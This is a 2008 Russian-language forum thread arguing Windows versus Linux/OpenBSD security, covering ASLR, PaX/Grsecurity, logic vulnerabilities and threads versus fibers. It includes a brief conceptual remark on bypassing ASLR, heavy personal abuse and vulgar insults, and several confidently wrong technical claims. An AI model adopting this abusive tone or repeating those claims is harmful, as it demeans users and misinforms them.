Тем защищенный, что уязвимый рантайм Си-подобных языков может быть скомпенсирован различными защитными механизмами времени компиляции и выполнения. Это позволяет свести целые *классы* уязвимостей к DoS: от выполнения произвольного кода - до раскрытия информации. В некоторых случаях - вероятностно (все, что касается рандомизации адресного пространства и совпадений случайных чисел), во многих - гарантированно. http://pax.grsecurity.net/docs/pax.txt
0 |
антипенгвин
17-11-2008 22:15:17
1. ASLR - это жалкий костыль, который лишь _немного_ усложняет написание шеллкода. 2. Уязвимости не сводятся к одному buffer overflow. И подпереть костылями сишный рантайм далеко недостаточно для безопасности.
0 |
Bugg
18-11-2008 03:38:04
1. ASLR - это жалкий костыль, который лишь _немного_ усложняет написание шеллкода. Единственной задачей ASLR является не усложнить "написание шеллкода", а уменьшить надежность эксплойта - то есть, шанс его срабатывания в реальных условиях. В каждом отдельном случае ASLR решает эту задачу с разным успехом - тут все зависит от того, возможно ли на практике проведение атаки грубой силой и какова общая случайная величина, которую атакующий должен подобрать. Ни в Hardened Gentoo, ни в OpenBSD ASLR не является единственным или даже основным средством защиты, в отличие от последних поделий корпорации-миллиардера. И наконец, на 64-битных платформах в некоторых случаях энтропия каждого отдельного адреса может достигать 30-40 бит, что на практике делает невозможной эксплуатацию даже prefork-демонов, потому как даже на 32-битных платформах шанс проведения атаки прежде всего зависит от админа, который согласно той или иной политики настроит или не настроит обработку сообщений об ошибках. Скажем, обработчик сообщений об аварийном завершении процесса prefork-демона может перезапускать демон и тем самым изменять случайные значения, не давая атакующему эксплуатировать уязвимость грубой силой. Кроме того, перезапуск может и должен производиться время от времени. На практике такой подход дополняется status-aware балансированием нагрузки путем распределения запросов к службе на несколько локальных или удаленных экземпляров демонов (это, к тому же, позволяет избежать простоев в работе при перезапуске одного из экземпляров демонов). Рекомендую все-таки изучить, хотя бы, перечень защитных механизмов в OpenBSD и PaX/Grsecurity. Это не даст представления о практическом их применении, сколько-нибудь близкого к полному, но, хотя бы, будет понятно, что на ASLR свет клином не сошелся. 2. Уязвимости не сводятся к одному buffer overflow. И подпереть костылями сишный рантайм далеко недостаточно для безопасности.Даже один ASLR вероятностно защищает не только от переполнений буфера, а в упомянутых системах им одним дело отнюдь не ограничивается. И подпереть костылями сишный рантайм далеко недостаточно для безопасности."Для безопасности", если брать один ее аспект - рантайм языка - может быть, и не достаточно. По крайней мере, в теории, поскольку придуманные механизмы защиты в некоторых случаях исключительно вероятностные - это и SSP, и StackGhost, и шифрование указателей в любом виде. Но речь не шла об обеспечении абсолютной безопасности. Я утверждал и утверждаю, что Hardened Gentoo и OpenBSD уже сегодня гораздо серьезнее защищены, чем поделия от МС. В том числе их ядра: в OpenBSD аудиту кода и защищенному проектированию уделяется большое внимание, а в случае с PaX/Grsecurity хлипкое ядро линукса прикрывается защитами рантайма, включая UDEREF и KERNEXEC (последний - только для x86).
0 |
антипенгвин
18-11-2008 04:29:55
не давая атакующему эксплуатировать уязвимость грубой силой.Подбирать адреса грубой силой будет только школьник или лентяй. Нормальный атакующий напишет шеллкод, который вручную найдет адреса загрузки нужных модулей, либо взяв адреса возврата в стеке по известным смещениям, относительно них узнает адрес нужной функции... Есть _логические_ уязвимости, которым пох на перечисленные защитные механизмы, и которые не обнаруживаются автоматизированными инструментами аудита. К примеру desktop файлы в КДЕ, старый эксплоит ADODB для MSIE...
0 |
антипенгвин
18-11-2008 16:55:41
Есть возражения - изложи их более обстоятельно.Возражение простое - десктоп файлы позволяли автоматический запуск исполняемых файлов, им было наплевать на PaX/Grsecurity...
0 |
29769
18-11-2008 18:00:04
Ты опиши подробней, а то смутное подозрение, что PaX/Grsecurity здесь ни при чем И десктоп-файлы тоже.
0 |
антипенгвин
19-11-2008 00:29:58
Ты опиши подробней, а то смутное подозрение, что PaX/Grsecurity здесь ни при чемКонечно ни при чем, про то и речь...
0 |
Bugg
19-11-2008 20:51:56
Обоснуй.
0 |
Гость
19-11-2008 01:52:19
Есть такая вещь как настройки по умолчанию, которые стоят у большинства пользователей(т.к. большинство среднестатистических юзеров не будут заморачиваться с выставлением прав доступа к файлам). "Пробив" уязвимости с настройками по умолчанию определяет общий "пробив" этой дыры.И много пользователей винды установили "исправление с сайта производителя"? Да, есть автообновление,но весомая часть, если не большинство их, эту фичу отключает нах, и с обновлениями не заморачивается. Вот их настройка по умолчанию. Консоль чтоли? _По умолчанию_ юзается КДЕ.НезачОт. А исчо спец по Линуксу. Ну, какая графическая рабочая среда используется в самом популярном дистрибутиве? Сможете ответить? А ведь ещё есть туева хуча более мелких сред. Дану? Винда позволяет использовать другие оболочки вместо дефолтного explorer.exe Список в студию! Кстати, что думает по этому поводу сама Майкрософт? Не потащат в кутузку за взлом системы? количество обнаруженных дыр напрямую зависит от популярности ОСА хрен ты угадал. Количество обнаруженных дыр напрямую зависит от изначальной дырявости кода, помноженной на его открытость, и только в последнюю очередь - от распространённости.
0 |
антипенгвин
19-11-2008 03:28:40
НезачОт. А исчо спец по Линуксу.Спец по линупсу? Если вы не заметили, я виндой пользуюсь ))) Кстати, что думает по этому поводу сама Майкрософт? Не потащат в кутузку за взлом системы?Не потащит, МС сама сделала параметр HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell чтобы можно было указать вместо експлорера другую оболочку. Насчет списка - не ко мне, меня эксплорер вполне устраивает. А хрен ты угадал. Количество обнаруженных дыр напрямую зависит от изначальной дырявости кода, помноженной на его открытость, и только в последнюю очередь - от распространённости.В последнюю очередь говоришь? Ну написал я программу, исходники открыты. Вопрос: сколько дыр в не обнаружено? Ответ: ни одной. Потому что никто их не искал, т.к. прогу юзают всего несколько человек. А если бы юзали миллионы, то и дыры бы нашлись. Так что низачет тебе.
0 |
36388
19-11-2008 12:25:11
Незачет тебе по статистике. Нужно знать, что несколько миллионов и несколько человек - две большие разницы.(с) А вот несколько миллионов и несколько сотен миллионов уже практически одно и то же в данном случае.
0 |
Bugg
19-11-2008 05:21:19
Лично у меня "пробив уязвимости" определяют мои настройки. И у моих пользователей, как не странно, тоже. А у тебя - твои настройки. [B]Консоль чтоли? _По умолчанию_ юзается КДЕ.[B] В Ubuntu - Gnome. В Gentoo - выбирается на этапе установки, затем настраивается; по умолчанию - twm. В винде по умолчанию нет антивируса, дырявый высокоуровневый файрвол, запущены отнюдь не всем нужные службы, а пользователь работает от администратора. Авторан включен, политики ограниченного использования программ - отключены, а к каждому сетевому интерфейсу привязана служба доступа к файлам и принтерам, для которой в файрволе по умолчанию задано исключение. Чтобы скачать патчи, пользователю нужно выйти в сеть, выставив наружу тот же 445-ый порт, на котором работает уязвимая служба с привилегиями SYSTEM. Когда тебе удобно, ты апеллируешь к умению грамотно настроить винду, когда неудобно - к настройкам по умолчанию. Но винда проигрывает линуксу в обоих случаях: и по набору возможностей, и по безопасности настроек по умолчанию. Дану? Винда позволяет использовать другие оболочки вместо дефолтного explorer.exeexplorer.exe отрисовывает окошечки, а интерфейс определяют системные библиотеки, используемые ПО в подавляющем большинстве случаев. Те же .lnk ярлыки интерпретируются одинаково, например, практически в любом интерфейсе открытия/сохранения файла, тогда как в аналогичных интерфейсах в Gnome и KDE .desktop-файлы интерпретируются только панелью и файловым менеджером. Кроме того, "выбор" в винде сводится к тому, чтобы заменить explorer.exe, а системные службы существуют как данность с привилегиями SYSTEM, содержащая уязвимости к линейному переполнению в стеке, - выбора нет. В линуксе, как и в любой юникс-подобной ОС, выбор есть. Повторюсь количесво обнаруженным дыр напрямую зависит о популярности ОС -> ее интереса для взломщиков...сказал человек, не представляющий, что такое безопасное программирование и дизайн ПО. Кроме того, не следует забывать, что в защищенном линуксе очень многие критические уязвимости, в том числе в ядре, сводятся к гораздо более безобидным DoS.
0 |
p
24-11-2008 15:37:33
"Повторюсь количесво обнаруженным дыр напрямую зависит о популярности ОС -> ее интереса для взломщиков " интерес для взломщиков очень часто напрямую зависит от количества дыр
0 |
18-11-2008 07:52:49
Уточню - ASLR в Windows, это жалкий костыль.
0 |
21-11-2008 18:43:45
Тем защищенный, что уя... не надо быть таким умным, вас никто не понимает.
0 |
user
17-11-2008 19:21:56
Понахватался умных слов и ляпает ими где надо и не надо, совершенно не к месту. В школу, мальчик.
0 |
Bugg
17-11-2008 19:28:17
Это антипенгвину или мне?
0 |
Q6600@3200
19-11-2008 09:59:06
DOS-like система - это как раз таки венда, если ты не знал. Даже до сих пор толком не научились дох#ядерность поддерживать нормально.
0 |
антипенгвин
19-11-2008 17:39:03
у быдло-линупса ядро было изначально однозадачное, многозадачность прикрутили уже потом. Именно в мире быдло-юникс было такое понятие как нить (fiber) - кривая и бестолковая программая эмуляция многопоточности.
0 |
23583
19-11-2008 20:16:40
у быдло-линупса ядро было изначально однозадачное, многозадачность прикрутили уже потом.Ха-ха-ха. Вот это клоун. Хотя нет, просто молодой ещё. Именно в мире быдло-юникс было такое понятие как нитьЗаканчивай школу, поступай в универ и выучи, что такое нить, что она называется не fiber, а thread, и что в винде нити тоже есть
0 |
антипенгвин
20-11-2008 02:08:03
иди бабушку свою учи двоечник... хреново вас в универе видать учат, или это только у линупсятников пингвиний жир вместо мозга? thread - это поток, а fiber - это нить, псевдопоток. А в винде скрипя сердцем ввели поддержку нитей для возможности быстрого портирования псевдомногопоточных юникс приложений. Чтобы долго не переписывать серверный двиг какого нибудь приложения, а быстро портировать и выпустить продукт на рынок, а потом уже в спокойном темпе переписать костыльную псевдомногопоточность на настоящие потоки (thread).
0 |
98949
20-11-2008 11:40:36
быстрого портирования псевдомногопоточных юникс приложенийЭто что же это получается, под винду софта своего мало, с юникса портировать нужно? Отстой какой. А говорил софт есть для всего. в спокойном темпе переписать костыльную псевдомногопоточность на настоящие потоки (thread). А это так надо? Если в юниксе эти старые софтины работают лучше, чем в винде, которая захлёбывается, если ей сделаешь тысячу реальных тредов.
0 |
антипенгвин
20-11-2008 16:22:33
Это что же это получается, под винду софта своего мало, с юникса портировать нужно? Отстой какой. А говорил софт есть для всего.Возможно кому-то это нужно. ИМХО нормальные разработчики такой херней не будут заниматься. Если в юниксе эти старые софтины работают лучше, чем в виндеПСЕВДОмногопоточность по определению не может работать лучше реальной многопоточности. , которая захлёбывается, если ей сделаешь тысячу реальных тредов.Ты просто не умеешь их готовить (с) Для высокопроизводительных многопоточных приложений есть такая вещь управления пулом потоков как порт завершения (completion port)
0 |
24323
20-11-2008 16:39:48
То, что ты ее называешь псевдо не делает ее такой. Для высокопроизводительных многопоточных приложений есть такая вещь управления пулом потоков как порт завершенияНу это да. У нас есть костыль вместо нормального планировщика (с)
0 |
антипенгвин
20-11-2008 17:46:05
То, что ты ее называешь псевдо не делает ее такой.для тех кто в танке, доступным языком: когда два потока выполняют две задачи - это многозадачность, когда один поток поочередно переключатся между двумя задачами - это ПСЕВДОмногозадачность. Ну это да. У нас есть костыль вместо нормального планировщика (с)Тяжелый случай. Биореактор однозначно.
0 |
28222
20-11-2008 18:06:34
для тех кто в танке, доступным языком: когда два потока выполняют две задачи - это многозадачность, когда один поток поочередно переключатся между двумя задачами - это ПСЕВДОмногозадачность. А когда один процесс порождает другой процесс, пусть и однопоточный, который выполняется параллельно - это что? Я конечно понимаю, что в винде так нельзя просто сделать и сделали фиберы.
0 |
антипенгвин
20-11-2008 18:33:22
А когда один процесс порождает другой процесс, пусть и однопоточный, который выполняется параллельно - это что? Это наверно имееться ввиду fork()? Я конечно понимаю, что в винде так нельзя просто сделать и сделали фиберы.И очень хорошо, что так не делается, имхо для создания потока не надо делать копию всего процесса. А для чего сделана поддержка фиберов я уже говорил.
0 |
34555
20-11-2008 19:14:09
он самый. А для чего сделана поддержка фиберов я уже говорил. ну да, большую кучу тредов (мне этот термин больше нравится) же не сделаешь, вот и начали костыли изобретать. И очень хорошо, что так не делается, имхо для создания потока не надо делать копию всего процесса. А оно так и не делается уже более 15 лет. хотя и до этого можно было не копировать весь процесс, а ссылку поставить до первого изменения.
0 |
59929
20-11-2008 20:48:19
хотя в некоторых случаях в целях безопасности лучше по старинке форкнуть.
0 |
Bugg
20-11-2008 20:18:30
И очень хорошо, что так не делается, имхо для создания потока не надо делать копию всего процесса....сказал человек, даже по книжкам не знакомый со сложностями, возникающие при программировании многопоточных приложений.
0 |
74732
20-11-2008 18:13:34
кстати, о планировщике. Недавно обнаружил, что винда до сих пор постоянно перебрасывает поток, потребляющий 100% процессора, с одного логического процессора на другой. При реальной многоядерности это не очень страшно, но вот если одно ядро работает с двумя потоками(Hyperthreading интеловский), а таких потоков два, то они постоянно перетасовываются, что приводит к нефиговому падению производительности из-за доступа к памяти (кэш 2-го уровня становится неактуальным после смены потока).
0 |
антипенгвин
20-11-2008 18:41:39
нашел в гугле умные слова? не поверю, что человек, не отличающий волокно от потока, "обнаруживает" как винда перебрасывает потоки между процессорами и когда становится неактуальным кеш 2-го уровня...
0 |
33395
20-11-2008 19:08:33
можешь не верить, фактов это не отменяет
0 |
Bugg
20-11-2008 20:12:23
когда один поток поочередно переключатся между двумя задачами - это ПСЕВДОмногозадачность.И когда такое свойство ОС, как многозадачность, стало зависеть от реализации нитей?
0 |
78222
20-11-2008 11:49:57
Кроме того, thread в любом справочнике по винде переводится как нить, можешь проверить, если не знаешь Кроме того, когда там POSIX threads появились? В QNX они точно были реализованы в 1992 году. О WinNT тогда ещё ничего не слышали.
0 |
антипенгвин
20-11-2008 16:02:48
фтопку POSIX, бедный АПИ, не натив для винды, кроме того непонятно кому он вобще нужен. ИМХО подсистему POSIX рано или поздно постигнет та же участь, что и подсистему OS/2 - свалка истории.
0 |
59886
20-11-2008 16:42:22
фтопку POSIX, бедный АПИ, не натив для винды, кроме того непонятно кому он вобще нужен.В винде? В винде он нужен американским военным - они принимают на эксплуатацию только UNIX-совместимые ОС. ИМХО подсистему POSIX рано или поздно постигнет та же участь, что и подсистему OS/2 - свалка истории. Да всё рано или поздно будет, не переживай.
0 |
Bugg
20-11-2008 17:12:52
Бедный, скудный API... О, ужас. Так мало фитч, что прямо-таки не ясно, как его таким продавать.
0 |
антипенгвин
20-11-2008 18:27:56
Да скудный. WinAPI предоставляет гораздо больше возможностей.
0 |
57445
20-11-2008 19:21:41
Например?
0 |
88753
20-11-2008 19:25:33
(ждем страшного примера про графику, "гордость" win32)
0 |
балмер
20-11-2008 19:42:09
RegisterDeviceNotification
0 |
83946
20-11-2008 20:46:08
курим udev, hal и dbus.
0 |
Bugg
20-11-2008 20:31:13
И это, по-твоему, лучше: больше возможностей. Ясно. Сложность программных систем считаешь благом, простоту - недостатком. В следующий раз, когда без обоснований заикнешься о безопасности, потрудись найти хоть одного именитого эксперта в области ИБ, который разделяет твое мнение.
0 |
Bugg
20-11-2008 14:27:55
Не нашел весомых аргументов против юникс-подобных ОС в настоящем - полез в прошлое. Вялый из тебя провокатор получился. Или тебя интересует сугубо полемика, а не уровень ее ведения? Или тебе комфортнее спорить с теми, кто знает меньше тебя?
0 |
антипенгвин
20-11-2008 16:39:19
В настоящее время распространенность этой "ОС" не выходит за рамки статистической погрешности. И не надо говорить про заговор мегакорпораций. Спрос все ставит на свои места. По поводу защитных механизмов, да все так, ASLR создает определенные проблемы для передачи упраления шеллкоду, но все это защита от переполнения, одним переполнением все не ограничивается, как я уже говорил. Пример - соседняя новость про уязвимость в OpenSSH.
0 |
45425
20-11-2008 16:44:51
В настоящее время распространенность этой "ОС" не выходит за рамки статистической погрешности. Это особенно заметно на серверах. А суперкомпьютеры вообще ярчайше демонстрируют твою бредятину.
0 |
73498
20-11-2008 16:47:06
Пример - соседняя новость про уязвимость в OpenSSH. кстати, 1) Фикс появился через 9 часов, а не через 9 лет. 2) уязвимость весьма малопрактична.
0 |
Bugg
20-11-2008 17:10:54
В настоящее время распространенность этой "ОС" не выходит за рамки статистической погрешности.В своих сегментах рынка юникс-подобные ОС преобладают. К тому же, распространенность в большей степени говорит об умении и желании продвигать продукт на рынке, а не о его реальных качествах. По поводу защитных механизмов, да все так, ASLR создает определенные проблемы для передачи упраления шеллкоду, но все это защита от переполненияКачественная, развиваемая защита, которой нет и не будет в поделиях от МС. одним переполнением все не ограничивается, как я уже говорил. Пример - соседняя новость про уязвимость в OpenSSH.Как ты уже говорил несколько раз. Но изначально ты был несогласен с тем, что защищенные юникс-подобные ОС безопаснее поделий от МС. Итак, логические уязвимости есть везде, вряд ли возможно корректно сравнить. Но... 1. Серьезные механизмы защиты от уязвимостей рантайма Си-подобных языков есть только в некоторых юникс-подобных ОС. 2. Системы мандатного контроля доступа - только в юникс-подобных ОС. 3. Безопасный дизайн архитектуры ПО и API, защитные механизмы стека TCP/IP - преимущественно (а на практике - только) в юникс-подобных ОС. 4. Безопасные настройки по умлочанию - то же самое. 5. Выбор системных компонентов - то же самое. 6. Простота и надежность - то же самое (смотри OpenBSD). 7. Открытый код - то же самое. Лапшу о том, что в код никто не смотрит, можешь вешать пионерам. Я всегда смотрю, как минимум, на этапе выбора одного из нескольких доступных инструментов. Иногда сам патчу баги, включая уязвимости, до выхода или вместо официальных патчей. А теперь обоснуй свое утверждение, что винда не менее безопасна.
0 |
anonymous
24-11-2008 02:24:20
у быдло-линупса ядро было изначально однозадачноеТут лежит первая версия 91-го года: ftp://ftp.kernel.org/pub/linux/kernel/Historic/ в boot.s - инициализация GDT, IDT (защищенный режим) в head.s - включение пейджинга (виртуальная память) в sched.c - планировщик задач(многозадачность) Винда же изначально была лишь 16-битной оболочкой для DOS, работающей в реальном режиме.
0 |
21-11-2008 18:38:48
DOS-like на повал! %)
0 |
21-11-2008 18:40:37
адекватные людирешают свои задачи максимально эффективнозадачи: геймеру погамиться в новейшие гамы второй раз на повал. До конца читать не буду пожалуй, а то взаправду кони двину.
0 |
21-11-2008 18:44:50
Будь его популярность повыше, +1
0 |
12-12-2008 23:18:06
пингвинятники не менее интереснее. Пингвинизм - это такая форма изощренного мазохизма. Понимают, что можно все делать проще и эффективнее, просто сесть за комп и решать свои задачи, без ковыряний в консоли и компелирования ядер, но тем не менее продолжают жрать кактус. Более того, они даже видят как более адекватные пользователи запросто играют в игры, без шаманских плясок с эмуляторами, пользуются нормальным софтом типа Офис, Фотожоп, а не не жалкими пародиями типа ОпенОфис, Гимп и т.д. Это такая форма помешательства, и к сожалению _буйного_, т.к. пытаються всех убедить, что их кривая псевдомногозадачная DOS-like ОС "типа крутая и фсе такое". Прежде всего стараются убедить себя, закрывают глаза на реальное положение вещей, на то, что они попросту неудачники, дочатся в консоли и зобретают велосипеды и констыли, тогда как более адекватные люди просто решают свои задачи максимально эффективно(задачи: геймеру погамиться в новейшие гамы, дизайнеру - рисовать дизайны в фотошопе, программисту - разрабатывать программы в _нормальной_ ИДЕ, а не в vim/eclipse). По поводу дыр - они есть везде. Достаточно вспомнить про desktop файлы в КДЕ, и про то как линупс сваливался в кернел паник от простого пинга И это при ~1,5% распространении линупса, а что было бы будь его популярность повыше - вобще ужос... - и правда какая страшная это штука антипингвинарий... там воспитание строгое, дЭнга платы, на срака нЭ сиди, работай работай и ещё раз работай - заветы Дедушки ещё в ходу?
0 |
64543
17-11-2008 23:46:14
Фу, устаревшая ОС. Уже пора было два года назад на висту перейти.
0 |
антипенгвин
18-11-2008 00:03:35
для меня самая оптимальная
0 |
99446
18-11-2008 18:03:01
Правда виндузятников в том, что они до сих пор юзают унылую устаревшую ОС 2001 года. Sad but true.
0 |
антипенгвин
19-11-2008 00:49:55
Ваша ОС еще не дотянула до Win 2000. Так что чья бы корова мычала, а ваша бы язык в жопу засунула...
0 |
abadonna
19-11-2008 09:37:09
Ваша ОС еще не дотянула до Win 2000. Это вы, батенька, воля ваша, что-то несуразное придумали. Над вами потешаться будут.© Она никогда в сторону этого убогого гибрида недоОС DOS и неудачной подделки под юникс - NT не "тянула", и не будет. Запомните, вызубрите правило: если в какой-то ОС что-либо организовано не как в винде, то это нормальный порядок вещей. Никто в мире(кроме некрософта) не обязан поддерживать винду, подражать ей и обеспечивать совместимость с ней и её деградировавшими пользователями.
0 |
антипенгвин
19-11-2008 10:31:41
ДОС тоже непохожа ни винду. Это наверно значит что она как и линупс суперсовременная, просто тщательно это скрывает )))) Вам батенька в цирк надо клоуном - у вас неплохо получается ))))
0 |
55723
19-11-2008 12:31:08
ГЫ. А он по своему малолетию оказывается думает, что Линукс - это что-то типа ДОС. ЛОЛ!!!
0 |
антипенгвин
19-11-2008 17:29:57
А линупс и есть что-то типа ДОС. Только ты по своему малолетию этого не понимаешь.
0 |
82559
19-11-2008 20:18:42
Чем же он как ДОС Может быть, в досе был 3D-интерфейс? Йоу? Так что же это получается, винда это шаг назад на 20 лет? Или ты даже не знаешь, что это такое.
0 |
антипенгвин
20-11-2008 02:20:27
уговорил, как ДОС с 3Д интерфейсом... ))) приделали графический интерфейс к ДОС-like консольной системе, и то криво...
0 |
43382
20-11-2008 11:36:57
Да, винда такая, ничего не поделаешь.
0 |
антипенгвин
20-11-2008 16:42:59
ты уже сделал домашнее задание, красноглазый школьник?
0 |
p
24-11-2008 16:09:21
а ви таки всегда юзаете эйджизм когда сказать больше нечего?
0 |
abadonna
20-11-2008 02:34:48
ДОС тоже непохожа ни винду. Это наверно значит что она как и линупс суперсовременная, просто тщательно это скрывает )))) Это называется - демагогия. К тому же, основанная на сомнительном утверждении, так как дос не может быть похожей на винду, являясь её предком, это винда похожа на дос, точнее унаследовала от неё массу уникальных по идиотизму особенностей, типа нумерации примонтированных разделов дисков буквами латинского алфавита, бардака с чувствительностью к регистру символов в именах файлов, отсутствия атрибута "исполняемый" для файлов, выдающейся по тупости и неудобству системы команд cmd.exe(ранее command.com)... Но объединяет эти два убожества не столько "диск Цэ", сколько вопиющее отсутствие культуры программирования и фундаментальной подготовки у авторов. Неудивительно, что она(виндоус, дос) так сильно привлекает дилетантов от ИТ, ведь там всё знакомые методы, первобытно-общинные. Вот за это вас(подоконников-фанатегов) многие люди, работающие с настоящими ОС, так не уважают.
0 |
Bugg
20-11-2008 14:13:37
Да он вообще не способен вести беседу по существу. Знаний нет, опыта нет. Скромность, вежливость, тактичность, обстоятельность, - отсутствуют. Просто еще один провокатор, воинствующий ламер.
0 |
антипенгвин
20-11-2008 16:46:20
с тупыми пенгвенятниками по другому нельзя, иначе слюной забрызжут! а так хоть уткнутся и пусть обтекают.... (с) пара постов ниже
0 |
Bugg
20-11-2008 17:15:35
Да не умеешь ты по-другому. Знаний и опыта не хватает. И безответственная критика в адрес ASLR - яркий тому пример.
0 |
антипенгвин
20-11-2008 17:18:08
Я тебе уже сказал по поводу твоего ASLR, это не панацея.
0 |
89394
20-11-2008 17:32:52
Да панацеи нет, никто ж не спорит. Но не винду ж юзать, если безопасность нужна, в самом деле.
0 |
Bugg
20-11-2008 17:46:23
Ты заявил, что методом грубой силы ASLR обходит только ленивый. Я возразил, что это не так, привел аргументы. Ты свое заявление обосновать не смог. Мне возразить по существу не смог. Тебя хватило только на попытку увести разговор в сторону логических уязвимостей. На что ты можешь претендовать с таким "послужным списком"? На звание воинствующего ламера, не более.
0 |
26822
20-11-2008 15:12:56
Виндузятники как всегда вежливы и приветливы.
0 |
33436
20-11-2008 16:06:07
с тупыми пенгвенятниками по другому нельзя, иначе слюной забрызжут! а так хоть уткнутся и пусть обтекают....
0 |
29338
20-11-2008 16:49:09
Пока что в ЭТОМ треде оскорбления были ТОЛЬКО от виндузятников. Интересная статистика, не правда ли.
0 |
антипенгвин
20-11-2008 17:30:24
А тупые передергивания, когда уже нечего сказать, постинг от чужого ника - это чьи подвиги? Скромность, вежливость, тактичность, обстоятельность, - отсутствуют.Они присутствуют, но только с адекватными людьми, к красноглазым сектантам это не относится... Знаний нет, опыта нет.Знания по линупсу мне особо не нужны, так как бесполезны. Опыта тоже немного, потому что предпочитаю пользоваться нормальными интсрументами, а не доисторическими кривыми поделками.
0 |
73296
20-11-2008 17:34:41
Знания по линупсу мне особо не нужны, так как бесполезны.ОК, значит все предыдущие сравнения, комментарии о линуксе далее считаем просто некомпетентными. Вот теперь все стало на свои места.
0 |
37733
20-11-2008 17:37:18
Они присутствуют, но только с адекватными людьми, к красноглазым сектантам это не относится... У меня они как-то в общении со всеми присутствуют, несмотря на то, что я виндой тоже часто пользуюсь.
0 |
Bugg
20-11-2008 17:57:20
Они присутствуют, но только с адекватными людьми, к красноглазым сектантам это не относится...Я, по-твоему, красноглазый сектант? Знания по линупсу мне особо не нужны, так как бесполезны.Папа не научил за свои слова отвечать? Думаешь, поливать помоями труд других людей, который ты не способен оценить, - это нормально? Опыта тоже немного, потому что предпочитаю пользоваться нормальными интсрументами, а не доисторическими кривыми поделками.И юниксы, и вся линейка коммерческих ОС от микрософта - очень схожи архитектурно. Их архитектура устарела практически в равной степени. У меня к тебе вопрос. По-твоему, винда более пригодна для решения любых задач, которые могут быть решены с помощью современных юникс-подобных ОС?
0 |
антипенгвин
20-11-2008 18:58:52
если под "юникс-подобными ОС?" понимаются системы с обычным ядром линукс, то скорее всего да, с учетом Windows Mobile и Windows CE.
0 |
66294
20-11-2008 19:19:21
В десктопах, в нетбуках, в роутерах, в кластерах, в новом багтрекере NASA, в самой большой БД в Yahoo используется обычное ядро линукс.
0 |
Bugg
20-11-2008 20:35:09
А если под "юникс-подобными ОС" понимаются именно юникс-подобные ОС, а не то, что тебе удобнее? Как тогда?
0 |
48435
20-11-2008 17:26:44
В винде все делается интуитивно понятно черех графический интерфейс. Даже авторан отключается?
0 |
bot
22-11-2008 17:44:12
впринципе да) надо просто поставить прогу!! или 2й вариант! это поставить какуюнить уже оттюненую сборку винды)
0 |
44787
20-11-2008 17:29:58
Поэтому и отношение к вам соответствующее. От нормальных людей от ношение ко всем нормальное. Майкрософт вон вообще считает Linux опасным конкурентом - какую кампанию get the facts затеяла. Один этот факт, что лидер ОС-строения боится Linux говорит о том, что Linux представляет из себя хорошую систему.
0 |
антипенгвин
20-11-2008 19:18:26
Имеешь что-нибудь сказать против качества кода, архитектурных решений и документации в OpenBSD и дочерних проектах?А ты имеешь что нибудь против качества кода, архитектурных решений и документации (ха-ха) в винде? Чем больше противоречий с реальностью, тем сильнее ожидаемый эффект?Противоречий? Посмотри сколько людей интересуются ассемблером в Windows и сколько в *никс... С "нашими дикими зависимостями" у меня нет никаких проблемpПоэтому такое и отношение к этим системам. Т.к. делаются для себя "джаст фор фан", а как ими будут пользоваться другие - это из проблемы. Поэтому другие и предпочитают более дружественные системы. Логика нервозного инфантила.У вас логика красноглазого сектанта. Нет бога кроме Пенгвина и Торвалц - пророк его ) На этом разговор с красноглазыми быдлопенгвиноидами считаю законченным, не считаю нужным продолжать "метать бисер перед свиньями". Молитесь дальше на свою кривую поделку, пока номальные люди над вами смеются %))))
0 |
38984
20-11-2008 19:27:52
Нет бога кроме Пенгвина и Торвалц - пророк егоИ почему ВСЕГДА подобную фразу произносит виндузятник. Прямо какая-то мания, ей-богу.
0 |
22457
20-11-2008 19:29:44
Поэтому такое и отношение к этим системам.У кого отношение-то? ты хоть вообще понимаешь, что такое зависимость?
0 |
53298
19-11-2008 12:29:47
а ваша бы язык в жопу засунула..Ну что ж такое, что за фантазии у виндузятников вечно. Это что, ОС так действует.
0 |
bill
22-11-2008 17:53:08
ага втроили в виндоз 25й кадр с текстом "Линукс говно! МС рулит! смерть пингвинам! возлюби майкрософт!" решили убрать это из висты! но сразу упали продажи *( к выходу 3 его сервиспака собираемся вернуть!
0 |
Bugg
18-11-2008 19:00:46
Ага. Уж ты ткнул, так ткнул. В "шеллкод".
0 |
антипенгвин
19-11-2008 04:09:15
друх любезный, шеллкод это "полезная нагрузка" эксплоита. Базонезависимый код который будет выполнятся в случае удачной эксплуатации уязвимости... А эксплоит служит для внедрения шеллкода (веб-страница, программа отсылающая шеллкод уязвимой службе и т.д.) Если для тебя это одно и то же, то ...
0 |
Bugg
19-11-2008 05:36:29
Я первый указал тебе на эту разницу. Будешь меня учить? Давай тогда по существу. Ты говорил, у тебя шеллкод будет выяснять рандомизированные адреса объектов и указателей в памяти. И до сих пор не рассказал, хотя бы, вкратце, каким образом ты смог бы обойтись без атаки грубой силой на ASLR в системах с SSP, W^X и PAGEEXEC/SEGMEXEC. Причем, поскольку о бесполезности ASLR ты заявил с апломбом, ничего не уточняя, не ставя ASLR вообще ни во что, я жду изложения общих методик, а не частных случаев повреждения динамической памяти или атак на указатели на объекты в стеке.
0 |
антипенгвин
19-11-2008 06:01:27
Будешь меня учить?что ты, что ты... Я эксплоиты и шеллкоды не пишу, поэтому имею весьма общее представление. Если шеллкод получит управление, он сможет получить из стека адреса возвратов и относительно их вычислить адреса нужных функций.
0 |
антипенгвин
19-11-2008 06:01:55
Будешь меня учить?что ты, что ты... Я эксплоиты и шеллкоды не пишу, поэтому имею весьма общее представление. Если шеллкод получит управление, он сможет получить из стека адреса возвратов и относительно их вычислить адреса нужных функций.
0 |
22843
19-11-2008 12:32:13
Проведи сначала лексический анализ слова шеллкод - поймешь много интересного.
0 |
63558
17-11-2008 23:48:51
противоречит вашим религиозным догмам... конечно, виндузятников никто не понимает. Это ж только они считают нормальным, если служба автообновления, настроенная не качать обновления, все равно их качает. Скажите, а эксплоита для MS08-068 ведь всё равно нет с точки зрения виндузятников, да?
0 |
антипенгвин
18-11-2008 00:02:05
эксплоит есть, но например против моего компа его применить не получится при всем желании...
0 |
83856
18-11-2008 11:21:50
За линуксовым роутером сидит. Такова жизнь: даже фанатам МС без линукса шагу ступить нельзя.
0 |
94955
18-11-2008 18:01:44
неужели виндовый?
0 |
У вас служба автообновления качает заплатки, когда вы настраивали не качать? Удивительно... наверное, это в линуксе ваши руки становятся чудным образом прямыми, а в винде - нет... Ну, или винда телепатически определяет вашу ненависть к ней и начинает капризничать
0 |
detgh
18-11-2008 00:07:37
Они всё прекрасно понимают, но не могут ведь они признаться, что их якобы защищённые и безопасные ОС - беспомощные смешные кривые поделки, ничем не безопасней Винды.
